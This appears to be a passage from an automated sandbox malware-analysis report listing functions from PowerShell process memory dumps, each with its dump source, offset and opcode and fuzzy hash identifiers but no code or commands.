                                                                                                                                                                                                                          Function 04B6AE80 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c4a2378804d5a625887babdc632f807b44da43569096eacdeac05660eb955229
                                                                                                                                                                                                                          • Instruction ID: 01632f466351bbdc683b13785d04cbd8e5fd499b692df58563227f33eb67c964
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4a2378804d5a625887babdc632f807b44da43569096eacdeac05660eb955229
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3315C70A016098FDF15DFA9D4947AEBAF6EF89200F1180A9E506E7350EB38AC018B51
                                                                                                                                                                                                                          Function 04B6AFA8 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ad732a825cb5b1d23d169753c2b681b49637d8520b4e1731b9a8402413eda2ee
                                                                                                                                                                                                                          • Instruction ID: 858a4a8ece6d12519e23873f6d2461364778f40604390e40874401d4afc214d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad732a825cb5b1d23d169753c2b681b49637d8520b4e1731b9a8402413eda2ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA21B271A043188FDB15DFAAD840B9FBBF5EF89320F14846ED519E7340CB78A9058BA5
                                                                                                                                                                                                                          Function 04B6AD48 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9a441147ae296a716f0064153b3098ffbf56313e4e7ad8e2898822046422b624
                                                                                                                                                                                                                          • Instruction ID: 4612a46104e5b73f14feab237c47cfaadb2c59a17902f9f49765f4add5c7bc80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a441147ae296a716f0064153b3098ffbf56313e4e7ad8e2898822046422b624
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A3130B4A002099FEB04EBA5D854ABE77B2EFC4304F108479DA15AB394DA39ED018F90
                                                                                                                                                                                                                          Function 07912700 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 289c988a99553f8a442ec66e07956337248958f9116fccff6053b2dad531c488
                                                                                                                                                                                                                          • Instruction ID: b6073fc107bcf7063550d0b87d7f26e0f1dc796b34bbca364259f7e3036f346e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 289c988a99553f8a442ec66e07956337248958f9116fccff6053b2dad531c488
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0521BFB5B0020EDFDB20EF59C545B6677F9BB45329F0480A6D8048B750D374E964CB61
                                                                                                                                                                                                                          Function 04B693F8 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 32f6f7ab8328c724d44b430b531b6c442f35de8638222489de88a98751caf02b
                                                                                                                                                                                                                          • Instruction ID: 0fabda5c9a7c8ef937a9e0818311cb0fce3b7994dbe989fdcb918f8c73e6c55f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32f6f7ab8328c724d44b430b531b6c442f35de8638222489de88a98751caf02b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84315CB49057448EDB60CF6AD48878AFFF2EF88310F28809DD94E9B215DB786445CB61
                                                                                                                                                                                                                          Function 049FF3D8 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 62f371f99b3ccf1d138e2c0d31bbe342c0094338c4141b30f404756ada02e33f
                                                                                                                                                                                                                          • Instruction ID: 31a359f2aab6d07e899fb7d8beb6a1bd83cf38eb61b134014af4a10b9361f898
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62f371f99b3ccf1d138e2c0d31bbe342c0094338c4141b30f404756ada02e33f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9421F776604300DFDF05DF10DDC8B16BB66FB88314F24C5AEEA090A25AC336E456CBA1
                                                                                                                                                                                                                          Function 049FF02C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 39f3ca45c664f8a0659edba1fef0b0979116d3bfb69153b76ccc68e300dded10
                                                                                                                                                                                                                          • Instruction ID: bb71977caab807db00fa155875629b1ec8c407c539d7b1ffa38b848570d13198
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f3ca45c664f8a0659edba1fef0b0979116d3bfb69153b76ccc68e300dded10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C2103756042009FDB10DF10D984B16BB65EB84324F28C9BADE094B24AC336E446CB61
                                                                                                                                                                                                                          Function 04B69408 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8fbdcc8ffdebc541f7ff4049c7333c0004a80a8d2f8dd972f18daf42f06d1474
                                                                                                                                                                                                                          • Instruction ID: 0c192a467504ffe45f17f6a299d3bb49b9b980f1a5c8a0452487a14e2db4a724
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fbdcc8ffdebc541f7ff4049c7333c0004a80a8d2f8dd972f18daf42f06d1474
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54217AB49017448EEB60CF6AD48878AFFF6FF88310F28C05ED95E97205DB7864818B61
                                                                                                                                                                                                                          Function 04B6767C Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 068d63a2f8f62fee167be830693f76377dc8feacfb25f07074165da410e67882
                                                                                                                                                                                                                          • Instruction ID: effc4a30764984e41f0edf5095b48ac44f81e2cbd50492d80ff6d22cbac57b53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 068d63a2f8f62fee167be830693f76377dc8feacfb25f07074165da410e67882
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A112B357001188FDB04DFA8D840AADB7F6EBCC615B0440A9EA0AEB315DF34EC018B90
                                                                                                                                                                                                                          Function 049FF3D3 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
                                                                                                                                                                                                                          • Instruction ID: 25f82f5a5c98f52a3d483cfdd1c668ca4935b5ea1fbe39391f2ef9d63dbf7aca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05050efde7f80e2bacd3aed6f2bd0425f272660e14b98707f66944896a751249
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7219D76504240DFCF16CF10D9C4B16BF72FB88314F24C5AADA494A66AC33AD46ACF91
                                                                                                                                                                                                                          Function 04B62C5C Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8d116941c9285eb27d35315bc4e2b6dae154bdff12bb46d7e6e1c4c21c1a4f27
                                                                                                                                                                                                                          • Instruction ID: 58c2470e38f6b0806227f36212415645964d6cacad32c502a20aca3444c2728e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d116941c9285eb27d35315bc4e2b6dae154bdff12bb46d7e6e1c4c21c1a4f27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5611A53550E3945FDB13DFA8DC609E9BF70EF4B220B0541C7D0949B2A3C22A9D49CB66
                                                                                                                                                                                                                          Function 049FF027 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
                                                                                                                                                                                                                          • Instruction ID: 3d8f41908115c583e20e7dffec24f967ae8d0c93af9456d3ead2fa7b94a2b377
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb2c615d30f077614c2f6e701b51ce97adb4e7859af34b9b872f5e3f8473804e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8119079504284DFCB15CF14D9C4B15BF61FB44324F28C6AEDD494B656C33AE44ACB51
                                                                                                                                                                                                                          Function 04B6BCF0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7ba65f9abdf7adf71adc2c64bb0c6208c559102677a6f0e8b9c7a61fe62543fe
                                                                                                                                                                                                                          • Instruction ID: e3c1c77e84805f2194dbd9b93cf57cf59ce2b339a1f52464eb9b46bdb1ae5c56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ba65f9abdf7adf71adc2c64bb0c6208c559102677a6f0e8b9c7a61fe62543fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1611AD316083449FD728DB36D494A6A7BF4EF46210F1488EEE08ACB6A2CB34B841D700
                                                                                                                                                                                                                          Function 04B6DCE1 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4654ae676525e20e13fe157c4f1cf184decea3a3ab1fe7686a1cb1d93c3c2b29
                                                                                                                                                                                                                          • Instruction ID: 454f699a723e431a819e61bab9f0bd54efefd2c6ef7829d4063a05616fbfdc0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4654ae676525e20e13fe157c4f1cf184decea3a3ab1fe7686a1cb1d93c3c2b29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99012232B04240DBCF02AB34D4448FCBBB5EF99310F1548EAD403AB322EA346C12CBA0
                                                                                                                                                                                                                          Function 04B6DEA0 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cec13a8d77e5ee1bf39bb512254ccf2fb3562eaae311dfcd064025fe4dbbce46
                                                                                                                                                                                                                          • Instruction ID: 4eaa42f30a88253716cb8cf9b4884cd461cf922702b1f365ccc8224caebaa503
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cec13a8d77e5ee1bf39bb512254ccf2fb3562eaae311dfcd064025fe4dbbce46
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F015635B016149FCB119F74D8449AEBBF5FB88315F1444ADE51BD3241D7315911CB51
                                                                                                                                                                                                                          Function 04B6DFD8 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 522a084966bf6145bf470dc2da997cbd81809d6dcc69e8f5553e357a63dbde6a
                                                                                                                                                                                                                          • Instruction ID: f620bc647f8df0b2066cad0679a0c6c876a269fa76fddb2aa9e2c37452e14f5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 522a084966bf6145bf470dc2da997cbd81809d6dcc69e8f5553e357a63dbde6a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711F7342047508FC728DF75D4548A6B7F6EF8921576489ADD04A87BA0CB32F846CB50
                                                                                                                                                                                                                          Function 049FD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 052dd7170b4a7e516485ebad285656201e31f357a0bd6a14dc17f2823a4b3642
                                                                                                                                                                                                                          • Instruction ID: 822e90e548619a09415ee5d0a51c6bc898519ec45b917a39f899b3d737150d9f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 052dd7170b4a7e516485ebad285656201e31f357a0bd6a14dc17f2823a4b3642
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8201F7715053049AE7104E11EC80B67BF9CDF41625F1CC62ADE0A4B142C678A441C7B1
                                                                                                                                                                                                                          Function 049FD006 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9bd223cc0cf500e7c60d6d86ef1d2d8cdb24480ea275b715ee12863ed8c0bf38
                                                                                                                                                                                                                          • Instruction ID: 9cd76683e3febb76204092b62fdea7a942a8cc18aca48528df47df121f3d7aa0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bd223cc0cf500e7c60d6d86ef1d2d8cdb24480ea275b715ee12863ed8c0bf38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F014C7200E3C09FD7128B259C94B62BFB8DF43224F1D81DBD9888F1A3C2695849C772
                                                                                                                                                                                                                          Function 04B6BF20 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4d5de4116fb09bc31159006f3ad461746afe7125dd94d776ba0f6f5d24612770
                                                                                                                                                                                                                          • Instruction ID: bc733b5a41924726e14ac590e8921cc76f4ad3731dc7231d5865f7a3898a85fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5de4116fb09bc31159006f3ad461746afe7125dd94d776ba0f6f5d24612770
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F0DC313093A06FD3018A699C409AA7FB8EF86220B0944BBF940CB262DA74CC00C760
                                                                                                                                                                                                                          Function 04B67958 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 94e8d66bb9f9de7b7a7a70d1e20cedc1b84dfe874bcb9586afa90166e71337c2
                                                                                                                                                                                                                          • Instruction ID: 242dbb42cccd8c9503bc20387c732897923e69efb578b9d8c13da542abd2f4b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94e8d66bb9f9de7b7a7a70d1e20cedc1b84dfe874bcb9586afa90166e71337c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F022303053409FD3359B68A84496F7BF8EF896207000AAEE40AC7651EE386C81C771
                                                                                                                                                                                                                          Function 04B6DC90 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f62448f85dfb436c5067ac81491af50090bb6c6813cd4b30b226536852c8c01f
                                                                                                                                                                                                                          • Instruction ID: 9a761629f9d4d5d4027fcb19bee202a622257051050ad6d0a9740000f611eeba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f62448f85dfb436c5067ac81491af50090bb6c6813cd4b30b226536852c8c01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0B4327057549F9712A76DE8108EA7B6DEEC627171504EBD50AC7200EA28A905C7F2
                                                                                                                                                                                                                          Function 04B690E0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c993d34ab4e582bd515987a4628b131f5e65a45846777339af2396c7c4094205
                                                                                                                                                                                                                          • Instruction ID: 334749a49a19fddb94b8c7d0b095db824f340899cbc1070f27560114cc6a11b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c993d34ab4e582bd515987a4628b131f5e65a45846777339af2396c7c4094205
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F801AF31644200AFE725AF78D4143AB7B61EFC331CF1581AAC9464B296DE3A6806CBA1
                                                                                                                                                                                                                          Function 049FD9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d966ce5a3acac3ca49459d1444423a8705750c68d63043c8037b85cd094ddcb4
                                                                                                                                                                                                                          • Instruction ID: 97007bafdf362e949026b12f7175114b362a3dbacace38d65e7971700fabc300
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d966ce5a3acac3ca49459d1444423a8705750c68d63043c8037b85cd094ddcb4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0F976200600AF97248F0ADD85C27FBADEFD4770719C56AE94A4B612C671FC41CFA0
                                                                                                                                                                                                                          Function 04B6DE40 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8db06caaf278d4212804e0b97e70d7935a84f0083730754f7dc1933e9ba2a420
                                                                                                                                                                                                                          • Instruction ID: 8b228b14f1ceb5032220e2d00c4ea169e4cc69239201437902fd226b111f9834
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db06caaf278d4212804e0b97e70d7935a84f0083730754f7dc1933e9ba2a420
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF05E353042508FC3008F19D894966BBF9EFCE61531914E9E486CB372DA61EC02CB90
                                                                                                                                                                                                                          Function 04B69160 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 980b9447eb671a66f04e015d352d3df7c707c9b5e97dc13eb0f9baea956f7f22
                                                                                                                                                                                                                          • Instruction ID: 1a2c3f04701b50291c0aa5ca0bd2e6b2ca7ed9b72c2a2cb644e7688d14ebf429
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 980b9447eb671a66f04e015d352d3df7c707c9b5e97dc13eb0f9baea956f7f22
